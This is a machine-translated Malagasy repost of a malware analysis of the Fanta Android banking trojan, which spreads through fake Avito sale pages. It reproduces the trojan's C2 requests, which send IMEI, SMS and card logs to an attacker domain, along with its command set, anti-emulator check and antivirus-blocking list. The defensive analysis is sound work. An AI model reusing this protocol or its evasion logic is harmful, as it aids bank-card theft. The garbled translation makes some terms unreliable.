ProHoster > Blog > vaovao amin'ny Internet > Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha

Indray andro ianao te hivarotra zavatra ao amin'ny Avito ary, rehefa namoaka ny famaritana amin'ny antsipiriany momba ny vokatrao (ohatra, ny maody RAM), dia hahazo ity hafatra ity ianao:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan talohaRaha vao manokatra ny rohy ianao dia hahita pejy toa tsy misy tsiny mampandre anao, ilay mpivarotra faly sy nahomby, fa nisy ny fividianana:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
Raha vantany vao tsindrio ny bokotra "Continue", dia alaina amin'ny fitaovana Android anao ny rakitra APK misy kisary sy anarana mahatoky. Nametraka fampiharana ianao izay nangataka zo AccessibilityService noho ny antony iray, dia nisy varavarankely roa nipoitra ary nanjavona haingana ary... Dia izay.

Mandeha manara-maso ny fifandanjanao ianao, saingy noho ny antony sasany dia manontany ny antsipirian'ny karatrao indray ny fampiharana banky anao. Rehefa avy niditra ny angon-drakitra dia misy zavatra mahatsiravina mitranga: noho ny antony mbola tsy mazava aminao, manomboka manjavona ny vola ao amin'ny kaontinao. Miezaka mamaha ny olana ianao, saingy manohitra ny findainao: manindry ny fanalahidy "Back" sy "Home", tsy maty ary tsy mamela anao hampihetsika ny fepetra fiarovana. Vokany, tavela tsy misy vola ianao, tsy voavidy ny entanao, very hevitra ianao ary manontany tena hoe: inona no nitranga?

Tsotra ny valiny: lasa niharan'ny Android Trojan Fanta ianao, mpikambana ao amin'ny fianakaviana Flexnet. Ahoana no nahatonga izany? Andao hazavaina izao.

Ireo mpanoratra: Andrey Polovinkin, manampahaizana zandriny amin'ny famakafakana malware, Ivan Pisarev, manampahaizana manokana amin'ny famakafakana malware.

Statistika sasany

Ny fianakaviana Flexnet an'ny Android Trojans dia fantatra voalohany tamin'ny taona 2015. Nandritra ny fe-potoana lava be, ny fianakaviana dia niitatra ho subspecies maromaro: Fanta, Limebot, Lipton, sns. Ny Trojan, ary koa ny fotodrafitrasa mifandraika amin'izany, dia tsy mijanona: misy rafitra fitsinjarana mahomby vaovao - amin'ny tranga misy antsika, pejy phishing avo lenta mikendry mpivarotra manokana, ary ny mpamorona Trojan dia manaraka ny fironana lamaody amin'ny fanoratana virus - manampy fiasa vaovao ahafahana mangalatra vola amin'ny fomba mahomby kokoa amin'ny fitaovana voan'ny aretina sy ny mekanika fiarovana.

Ny fanentanana voalaza ato amin'ity lahatsoratra ity dia natao ho an'ireo mpampiasa avy any Rosia; vitsy ny fitaovana voarakitra ao Okraina, ary vitsy kokoa aza any Kazakhstan sy Belarosia.

Na dia efa tao amin'ny kianja Android Trojan nandritra ny 4 taona mahery izao aza ny Flexnet ary efa nodinihin'ny mpikaroka maro amin'ny antsipiriany, dia mbola ao anatin'ny endriny tsara izy io. Nanomboka tamin'ny Janoary 2019, mihoatra ny 35 tapitrisa robla ny mety ho fahasimbana - ary natao ho an'ny fampielezan-kevitra any Rosia ihany izany. Tamin'ny taona 2015 dia namidy tamin'ny forum ambanin'ny tany ny dikan-teny isan-karazany amin'ity Trojan Android ity, izay ahitana ny loharano loharanon'ny Trojan misy famaritana amin'ny antsipiriany ihany koa. Midika izany fa ny antontan'isa momba ny fahasimbana eo amin'izao tontolo izao dia mbola mahavariana kokoa. Tsy famantarana ratsy ho an'ny antitra toy izany, sa tsy izany?

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha

Hatramin'ny fivarotana ka hatramin'ny fitaka

Araka ny hita tamin'ny pikantsary naseho teo aloha momba ny pejy phishing ho an'ny serivisy Internet amin'ny fandefasana doka Avito, dia nomanina ho an'ny niharam-boina manokana izany. Toa mampiasa ny iray amin'ireo mpizara Avito ireo mpanafika, izay maka ny laharan-telefaona sy ny anaran'ny mpivarotra, ary koa ny famaritana ny vokatra. Aorian'ny fanitarana ny pejy sy ny fanomanana ny rakitra APK dia alefa SMS miaraka amin'ny anarany sy rohy mankany amin'ny pejy phishing misy famaritana ny vokatra sy ny vola azo avy amin'ny "fivarotana" ny vokatra ilay niharam-boina. Amin'ny fipihana ny bokotra, ny mpampiasa dia mahazo rakitra APK ratsy - Fanta.

Ny fanadihadiana momba ny sehatra shcet491[.]ru dia nampiseho fa natolotra ho an'ny mpizara DNS Hostinger izany:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Ny fisie domain zone dia misy fidirana manondro ny adiresy IP 31.220.23[.]236, 31.220.23[.]243, ary 31.220.23[.]235. Na izany aza, manondro ny lohamilina misy adiresy IP 178.132.1[.]240 ny rakitra loharanon-karena voalohany an'ny sehatra (Rakitra iray).

Ny adiresy IP 178.132.1[.]240 dia any Holandy ary an'ny mpampiantrano azy WorldStream. Ny adiresy IP 31.220.23[.]235, 31.220.23[.]236 ary 31.220.23[.]243 dia hita any UK ary an'ny mpizara fampiantranoana iombonana HOSTINGER. Ampiasaina ho firaketana openprov-ru. Namaha ny adiresy IP 178.132.1[.]240 ihany koa ireto sehatra manaraka ireto:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Marihina fa ny rohy amin'ity endrika manaraka ity dia saika azo avy amin'ny sehatra rehetra:

http://(www.){0,1}<%domain%>/[0-9]{7}

Ity môdely ity dia misy rohy avy amin'ny hafatra SMS ihany koa. Araka ny angon-drakitra ara-tantara, dia hita fa ny sehatra iray dia mifanandrify amin'ny rohy maromaro ao amin'ny lamina voalaza etsy ambony, izay manondro fa ny sehatra iray dia nampiasaina mba hizarana ny Trojan amin'ireo niharam-boina maromaro.

Andao hitsambikina kely: ny Trojan alaina amin'ny alàlan'ny rohy avy amin'ny SMS dia mampiasa ny adiresy ho mpizara fanaraha-maso onusedseddohap[.]club. Ity sehatra ity dia voasoratra tamin'ny 2019-03-12, ary nanomboka tamin'ny 2019-04-29, nifanerasera tamin'ity sehatra ity ny fampiharana APK. Miorina amin'ny angona azo avy amin'ny VirusTotal, fampiharana 109 no nifanerasera tamin'ity mpizara ity. Ny sehatra mihitsy no namaha ny adiresy IP 217.23.14[.]27, any Holandy ary tompon'ny mpampiantrano WorldStream. Ampiasaina ho firaketana namecheap. Namaha ity adiresy IP ity ihany koa ny sehatra klioba bad-racoon[.]. (manomboka ny 2018-09-25) ary bad-racoon[.]live (manomboka ny 2018-10-25). Miaraka amin'ny sehatra klioba bad-racoon[.]. mihoatra ny 80 APK rakitra nifanerasera tamin'ny bad-racoon[.]live - mihoatra ny 100.

Amin'ny ankapobeny, ny fanafihana dia toy izao manaraka izao:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha

Inona no ao ambanin'ny saron'i Fanta?

Tahaka ny Android Trojans maro hafa, ny Fanta dia afaka mamaky sy mandefa hafatra SMS, manao fangatahana USSD, ary mampiseho ny varavarankely ao an-tampon'ny rindranasa (anisan'izany ny banky). Na izany aza, tonga ny arsenal ny fiasan'ity fianakaviana ity: nanomboka nampiasa ny Fanta AccessibilityService ho an'ny tanjona isan-karazany: mamaky ny votoatin'ny fampandrenesana avy amin'ny rindranasa hafa, manakana ny fisavana sy ny fampitsaharana ny famonoana Trojan amin'ny fitaovana voan'ny aretina, sns. Fanta dia miasa amin'ny dikan-teny Android rehetra tsy latsaky ny 4.4. Amin'ity lahatsoratra ity dia hojerentsika akaiky ity santionany Fanta manaraka ity:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Avy hatrany aorian'ny fandefasana

Avy hatrany aorian'ny fandefasana dia manafina ny kisary ny Trojan. Ny fampiharana dia tsy afaka miasa raha tsy ao anaty lisitra ny anaran'ilay fitaovana voa:

  • android_x86
  • VirtualBox
  • Nexus 5X (omby)
  • Nexus 5 (hareza)

Ity fanamarinana ity dia atao amin'ny serivisy lehibe amin'ny Trojan - MainService. Rehefa natomboka voalohany, ny mari-pamantarana fanamafisam-peo an'ny rindranasa dia atomboka amin'ny soatoavina default (ny endrika fitehirizana angon-drakitra fanamafisana sy ny dikany dia horesahina any aoriana), ary misy fitaovana vaovao voarakitra ao amin'ny mpizara fanaraha-maso. Ny fangatahana HTTP POST miaraka amin'ny karazana hafatra dia halefa any amin'ny mpizara register_bot ary fampahalalana momba ny fitaovana voan'ny aretina (dika Android, IMEI, nomeraon-telefaona, anaran'ny mpandraharaha ary kaody firenena izay nisoratra anarana ny mpandraharaha). Ny adiresy dia miasa ho mpizara fanaraha-maso hXXp://onuseseddohap[.]club/controller.php. Ho setrin'izany dia mandefa hafatra misy ireo saha ny mpizara bot_id, bot_pwd, mpizara - ny fampiharana dia mitahiry ireo soatoavina ireo ho mari-pamantarana ny mpizara CnC. fikirana mpizara azo atao raha tsy voaray ny saha: Mampiasa ny adiresy fisoratana anarana i Fanta - hXXp://onuseseddohap[.]club/controller.php. Ny fiasan'ny fanovana ny adiresin'ny CnC dia azo ampiasaina hamahana olana roa: ny fizarana ny enta-mavesatra eo amin'ny mpizara maromaro (raha misy fitaovana marobe marobe, ny enta-mavesatra amin'ny mpizara tranonkala iray tsy voafehy dia mety ho ambony), ary koa ny fampiasana. mpizara hafa raha sendra ny tsy fahombiazan'ny iray amin'ireo mpizara CnC.

Raha misy hadisoana mitranga eo am-pandefasana ny fangatahana, dia hamerina ny fizotry ny fisoratana anarana ny Trojan rehefa afaka 20 segondra.

Raha vantany vao voarakitra soa aman-tsara ilay fitaovana, dia hampiseho ity hafatra manaraka ity amin'ny mpampiasa i Fanta:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
Fanamarihana manan-danja: ny serivisy antsoina Fiarovana ny rafitra - ny anaran'ny serivisy Trojan, ary rehefa avy manindry ny bokotra OK Hisy varavarankely hisokatra miaraka amin'ny firafitry ny Accessibility an'ny fitaovana voan'ny aretina, izay tsy maintsy omen'ny mpampiasa ny zon'ny Accessibility ho an'ny serivisy ratsy:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
Raha vao mihodina ny mpampiasa AccessibilityService, Fanta dia mahazo miditra amin'ny votoatin'ny fikandrana fampiharana sy ny hetsika atao ao aminy:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
Vantany vao nahazo ny zon'ny fidirana, ny Trojan dia mangataka zon'ny mpitantana sy zo hamaky fampandrenesana:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
Amin'ny fampiasana ny AccessibilityService, ny fampiharana dia manao simulate ny fanendry fanalahidy, ka manome azy ny zo ilaina rehetra.

Ny Fanta dia mamorona tranga angon-drakitra marobe (izay holazaina any aoriana) ilaina amin'ny fitahirizana angon-drakitra fikirakirana, ary koa ny fampahalalana nangonina nandritra ny dingana momba ilay fitaovana voan'ny aretina. Mba handefasana ny vaovao voaangona, ny Trojan dia mamorona asa miverimberina natao hisintonana saha avy amin'ny angon-drakitra ary handray baiko avy amin'ny mpizara fanaraha-maso. Ny elanelam-potoana hidirana amin'ny CnC dia apetraka miankina amin'ny dikan-Android: amin'ny tranga 5.1, ny elanelana dia ho 10 segondra, raha tsy izany dia 60 segondra.

Mba hahazoana ny baiko dia manao fangatahana i Fanta GetTask mankany amin'ny mpizara fitantanana. Ho setrin'izany dia afaka mandefa ny iray amin'ireto baiko manaraka ireto ny CnC:

ekipa famaritana
0 Mandefasa hafatra SMS
1 Manaova antso an-telefaona na baiko USSD
2 Manavao paramètre elanelana
3 Manavao paramètre manakana
6 Manavao paramètre smsManager
9 Manomboka manangona hafatra SMS
11 Avereno amin'ny firafitry ny orinasa ny findainao
12 Alefaso/Atsaharo ny fanoratana ny famoronana boaty fifampiresahana

Ny Fanta koa dia manangona fampandrenesana avy amin'ny fampiharana banky 70, rafitra fandoavam-bola haingana ary e-wallet ary mitahiry izany ao anaty tahiry.

Fitehirizana masontsivana config

Mba hitahiry ny mari-pamantarana fanamafisana, mampiasa fomba fiasa mahazatra ho an'ny sehatra Android i Fanta - safidinao- rakitra. Ny fandrindrana dia ho voatahiry amin'ny rakitra iray nomena anarana Fikirana. Ny famaritana ny masontsivana voatahiry dia eo amin'ny tabilao etsy ambany.

anarana Sanda default Soatoavina azo atao famaritana
id 0 Integer Bot ID
mpizara hXXp://onuseseddohap[.]club/ URL Mifehy ny adiresin'ny mpizara
pwd - String Tenimiafina mpizara
elanelana 20 Integer Elanelanelan'ny fotoana. Manondro hoe hafiriana no tokony hanemorana ireto asa manaraka ireto:

  • Rehefa mandefa fangatahana momba ny satan'ny hafatra SMS nalefa
  • Mandray baiko vaovao avy amin'ny mpizara fitantanana
manakana rehetra rehetra/telNumber Raha mitovy amin'ny tady ny saha rehetra na telNumber, dia ho voasambotry ny fampiharana ny hafatra SMS voaray fa tsy aseho amin'ny mpampiasa
smsManager 0 0/1 Alefaso / esory ny fampiharana amin'ny maha-mpahazo SMS default
readDialog diso Marina/diso Alefaso/Atsaharo ny firaketana hetsika AccessibilityEvent

Fanta koa dia mampiasa ny rakitra smsManager:

anarana Sanda default Soatoavina azo atao famaritana
pckg - String Anaran'ny mpitantana hafatra SMS ampiasaina

Fifandraisana amin'ny angon-drakitra

Mandritra ny asany dia mampiasa tahiry roa ny Trojan. Database nomena a ampiasaina hitehirizana vaovao isan-karazany voaangona avy amin'ny finday. Ny angon-drakitra faharoa dia nomena anarana fanta.db ary ampiasaina hitahiry ny toe-javatra tompon'andraikitra amin'ny famoronana fikandrana fikandrana natao hanangonana vaovao momba ny karatra banky.

Trojan dia mampiasa database а mba hitahiry ny vaovao voaangona sy hanoratana ny hetsikao. Ny angona dia voatahiry ao anaty latabatra hazo. Mba hamoronana latabatra dia ampiasao ity fangatahana SQL manaraka ity:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Ny tahiry dia ahitana ireto fampahalalana manaraka ireto:

1. Manoratra ny fanombohana ny fitaovana voan'ny aretina miaraka amin'ny hafatra Nandeha ny finday!

2. Fampandrenesana avy amin'ny fampiharana. Ny hafatra dia noforonina araka ity môdely manaraka ity:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Ny angona amin'ny karatra banky avy amin'ny endrika phishing noforonin'ny Trojan. fikirana VIEW_NAME mety ho iray amin'ireto manaraka ireto:

  • AliExpress
  • Avito
  • Google Play
  • Miscellaneous <%App Name%>

Ny hafatra dia misoratra amin'ny endrika:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Hafatra SMS miditra/mivoaka amin'ny endrika:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Fampahalalana momba ny fonosana izay mamorona ny boaty fifampiresahana amin'ny endrika:

(<%Package name%>)<%Package information%>

Ohatra latabatra hazo:

Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
Iray amin'ny fiasan'ny Fanta ny fanangonana vaovao momba ny karatra banky. Ny fanangonana angon-drakitra dia mitranga amin'ny famoronana varavarankely phishing rehefa manokatra fampiharana banky. Ny Trojan dia mamorona varavarankely phishing indray mandeha monja. Voatahiry ao anaty latabatra ny fampahalalana izay naseho tamin'ny mpampiasa ny varavarankely Fikirana ao amin'ny tahiry fanta.db. Mba hamoronana angon-drakitra dia ampiasao ity fangatahana SQL manaraka ity:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Sahan-databatra rehetra Fikirana amin'ny alàlan'ny default dia natomboka ho 1 (mamorona varavarankely phishing). Aorian'ny fidiran'ny mpampiasa ny angonany dia apetraka amin'ny 0 ny sandany. Ohatra amin'ny saha latabatra Fikirana:

  • can_login - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra fangatahana banky
  • first_bank - tsy ampiasaina
  • can_avito - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra ny fampiharana Avito
  • can_ali - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra ny fampiharana Aliexpress
  • afaka_hafa - Ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra fampiharana avy amin'ny lisitra: Yula, Pandao, Drom Auto, Wallet. Karatra fihenam-bidy sy bonus, Aviasales, Famandrihana, Trivago
  • can_card - ny saha dia tompon'andraikitra amin'ny fampisehoana ny endrika rehefa manokatra Google Play

Fifandraisana amin'ny mpizara fitantanana

Ny fifandraisana amin'ny tambajotra amin'ny mpizara fitantanana dia mitranga amin'ny alàlan'ny protocol HTTP. Mba hiasa amin'ny tambajotra dia mampiasa ny tranomboky Retrofit malaza i Fanta. Ny fangatahana dia alefa amin'ny: hXXp://onuseseddohap[.]club/controller.php. Ny adiresin'ny mpizara dia azo ovaina rehefa misoratra anarana amin'ny mpizara. Ny cookies dia azo alefa ho valin'ny server. Fanta dia manao ireto fangatahana manaraka ireto amin'ny mpizara:

  • Ny fisoratana anarana amin'ny bot amin'ny mpizara fanaraha-maso dia mitranga indray mandeha, amin'ny fandefasana voalohany. Ireto angon-drakitra manaraka ireto momba ny fitaovana voan'ny aretina dia alefa any amin'ny mpizara:
    · Cookie - cookies azo avy amin'ny mpizara (ny sanda tsy misy dikany dia tady foana)
    · maody — tady tsy miova register_bot
    · tovona - tsy miova integer 2
    · version_sdk - dia miforona araka ity môdely manaraka ity: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI amin'ny fitaovana voan'ny aretina
    · firenena — kaodin'ny firenena nisoratra anarana ny mpandraharaha, amin'ny endrika ISO
    · isa - nomeraon-telefaona
    · mpandraharaha - anaran'ny mpandraharaha

    Ohatra amin'ny fangatahana nalefa tany amin'ny mpizara:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Ho setrin'ny fangatahana, ny mpizara dia tsy maintsy mamerina zavatra JSON misy ireto marika manaraka ireto:
    · bot_id - ID ny fitaovana voan'ny aretina. Raha mitovy amin'ny 0 ny bot_id dia hanatanteraka indray ny fangatahana ny Fanta.
    bot_pwd - tenimiafina ho an'ny mpizara.
    mpizara — mifehy ny adiresy mpizara. Parameter azo atao. Raha tsy voafaritra ny mari-pamantarana dia ny adiresy voatahiry ao amin'ny fampiharana no hampiasaina.

    Ohatra JSON object:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Mangataka ny handray baiko avy amin'ny mpizara. Ireto angona manaraka ireto dia alefa any amin'ny mpizara:
    · Cookie — cookies azo avy amin'ny mpizara
    · dia asao - ID ny fitaovana voaray rehefa mandefa ny fangatahana register_bot
    · pwd - tenimiafina ho an'ny mpizara
    · divice_admin - ny saha no mamaritra raha efa azo ny zon'ny mpitantana. Raha azo ny zon'ny mpitantana dia mitovy ny saha 1, raha tsy izany 0
    · Accessibility - Satan'ny asa fanompoana Accessibility. Raha nanomboka ny serivisy dia ny sandany 1, raha tsy izany 0
    · SMSManager — mampiseho raha alefa ny Trojan ho toy ny fampiharana default amin'ny fandraisana SMS
    · efijery - mampiseho ny toetry ny efijery. Hapetraka ny sandany 1, raha mandeha ny efijery, raha tsy izany 0;

    Ohatra amin'ny fangatahana nalefa tany amin'ny mpizara:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Miankina amin'ny baiko, ny mpizara dia afaka mamerina zavatra JSON miaraka amin'ny mari-pamantarana samihafa:

    · ekipa Mandefasa hafatra SMS: Ny masontsivana dia ahitana ny laharan-telefaona, ny lahatsoratry ny hafatra SMS ary ny ID ny hafatra alefa. Ny famantarana dia ampiasaina rehefa mandefa hafatra amin'ny mpizara misy karazana setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · ekipa Manaova antso an-telefaona na baiko USSD: Ny nomeraon-telefaonina na baiko dia tonga ao amin'ny vata famaliana. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · ekipa Hanova ny mari-pamantarana elanelana. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · ekipa Hanova ny paramètre intercept. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · ekipa Hanova ny saha SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · ekipa Manangona hafatra SMS avy amin'ny fitaovana voa.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · ekipa Avereno amin'ny firafitry ny orinasa ny findainao: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · ekipa Hanova ny parameter ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Mandefa hafatra misy karazana setSmsStatus. Ity fangatahana ity dia atao rehefa vita ny baiko Mandefasa hafatra SMS. Toy izao ny fangatahana:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Mampakatra ny votoatin'ny angon-drakitra. Andalana iray no alefa isaky ny fangatahana. Ireto angona manaraka ireto dia alefa any amin'ny mpizara:
    · Cookie — cookies azo avy amin'ny mpizara
    · maody — tady tsy miova setSaveInboxSms
    · dia asao - ID ny fitaovana voaray rehefa mandefa ny fangatahana register_bot
    · lahatsoratra - lahatsoratra ao amin'ny firaketana angon-drakitra ankehitriny (field d avy amin'ny latabatra hazo ao amin'ny tahiry а)
    · isa - anaran'ny rakitra angona ankehitriny (field p avy amin'ny latabatra hazo ao amin'ny tahiry а)
    · sms_mode - sanda integer (saha m avy amin'ny latabatra hazo ao amin'ny tahiry а)

    Toy izao ny fangatahana:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Raha azo alefa any amin'ny mpizara dia ho voafafa tsy ho eo amin'ny latabatra ny laharana. Ohatra amin'ny zavatra JSON naverin'ny mpizara:

    {
    "response":[],
    "status":"ok"
}

Fifandraisana amin'ny AccessibilityService

Ny AccessibilityService dia nampiharina mba hanamora ny fampiasana ny fitaovana Android ho an'ny olona manana fahasembanana. Amin'ny ankamaroan'ny toe-javatra, ny fifandraisana ara-batana dia ilaina mba hifaneraserana amin'ny fampiharana. AccessibilityService dia ahafahanao manao azy ireo amin'ny programa. Mampiasa ny serivisy ny Fanta hamorona varavarankely hosoka amin'ny rindranasa banky ary manakana ny mpampiasa tsy hanokatra ny rafitra sy ny rindranasa sasany.

Amin'ny fampiasana ny fiasan'ny AccessibilityService, ny Trojan dia manara-maso ny fiovan'ny singa eo amin'ny efijery ny fitaovana voan'ny aretina. Araka ny efa voalaza teo aloha, ny firafitry ny Fanta dia misy masontsivana iray tompon'andraikitra amin'ny hetsika fanoratana miaraka amin'ny boaty fifampiresahana - readDialog. Raha apetraka io mari-pamantarana io, dia ampiana ao amin'ny angon-drakitra ny fampahalalana momba ny anarana sy ny famaritana ny fonosana nahatonga ny hetsika. Ny Trojan dia manao ireto hetsika manaraka ireto rehefa misy hetsika:

  • Simulates fanerena ny lamosina sy ny fanalahidin'ny trano amin'ireto tranga manaraka ireto:
    · raha te hamerina ny fitaovany ny mpampiasa
    · raha te-hamafa ny fampiharana "Avito" na hanova ny zo fidirana ny mpampiasa
    · raha misy filazana ny fampiharana "Avito" ao amin'ny pejy
    · rehefa manokatra ny fampiharana Google Play Protect
    · rehefa manokatra pejy misy fika AccessibilityService
    · rehefa miseho ny boaty fifanakalozan-kevitra System Security
    · rehefa manokatra ny pejy miaraka amin'ny firafitry ny "Draw over other app".
    · rehefa manokatra ny pejy "Applications", "Recovery and reset", "Data reset", "Reset Settings", "Developer panel", "Special. fahafahana”, “Zo manokana”, “Zo manokana”
    · raha ny fampiharana sasany no namorona ny hetsika.

    Lisitry ny fampiharana

    • Android
    • Master Lite
    • Tompony madio
    • Clean Master ho an'ny CPU x86
    • Fitantanana fahazoan-dàlana amin'ny fampiharana Meizu
    • MIUI Security
    • Clean Master - Antivirus & Cache ary mpanadio fako
    • Fifehezan'ny ray aman-dreny sy GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & fiarovana maimaim-poana 2019
    • Mobile Security MegaFon
    • AVG Protection ho an'ny Xperia
    • Mobile Security
    • Malwarebytes antivirus & fiarovana
    • Antivirus ho an'ny Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG ho an'ny Huawei Tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Mpitarika fiarovana
    • Speed ​​​​Booster
    • dr.web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus sy fiarovana amin'ny finday
    • Kaspersky Internet Security: Antivirus sy fiarovana
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - fiarovana sy fitantanana
    • AVG Antivirus maimaim-poana 2019 - Fiarovana ho an'ny Android
    • Android Antivirus
    • Norton Mobile Security sy Antivirus
    • Antivirus, firewall, VPN, fiarovana finday
    • Fiarovana amin'ny finday: antivirus, VPN, fiarovana amin'ny halatra
    • Antivirus ho an'ny Android

  • Raha mangataka alalana amin'ny fandefasana hafatra SMS amin'ny isa fohy, ny Fanta dia manao simulate ny manindry ny boaty Tsarovy ny safidy ary bokotra Send.
  • Rehefa manandrana manaisotra ny zon'ny mpitantana amin'ny Trojan ianao dia manidy ny efijery finday.
  • Manakana ny fampidirana mpitantana vaovao.
  • Raha ny fampiharana antivirus dr.web nahita fandrahonana, maka tahaka ny fanerena ny bokotra i Fanta tsinontsinona.
  • Ny Trojan dia manindry ny bokotra aoriana sy an-trano raha noforonin'ny fampiharana ilay hetsika Samsung Device Care.
  • Fanta dia mamorona fikandrana phishing miaraka amin'ny endrika fampidirana vaovao momba ny karatra banky raha misy fampiharana avy amin'ny lisitry ny serivisy Internet 30 eo ho eo no natomboka. Anisan'izany: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, sns.

    Forms phishing

    Fanta dia manadihady izay fampiharana mandeha amin'ny fitaovana voan'ny aretina. Raha nosokafana ny fampiharana mahaliana iray, ny Trojan dia mampiseho varavarankely phishing eo ambonin'ny hafa rehetra, izay endrika fampidirana fampahalalana momba ny karatra banky. Ny mpampiasa dia tsy maintsy mampiditra ireto data manaraka ireto:

    • Nomeraon-karatra
    • Daty lany ny karatra
    • CVV
    • Anaran'ny tompon'ny karatra (tsy ho an'ny banky rehetra)

    Miankina amin'ny fampiharana mandeha dia hiseho ny varavarankely phishing samihafa. Ireto ambany ireto ny ohatra amin'ny sasany amin'izy ireo:

    AliExpress:

    Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
    Avito:

    Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha
    Ho an'ny fampiharana hafa sasany, oh. Google Play Market, Aviasales, Pandao, Famandrihana, Trivago:
    Leysya, Fanta: tetika vaovao ho an'ny Android Trojan taloha

    Ahoana tokoa moa izany

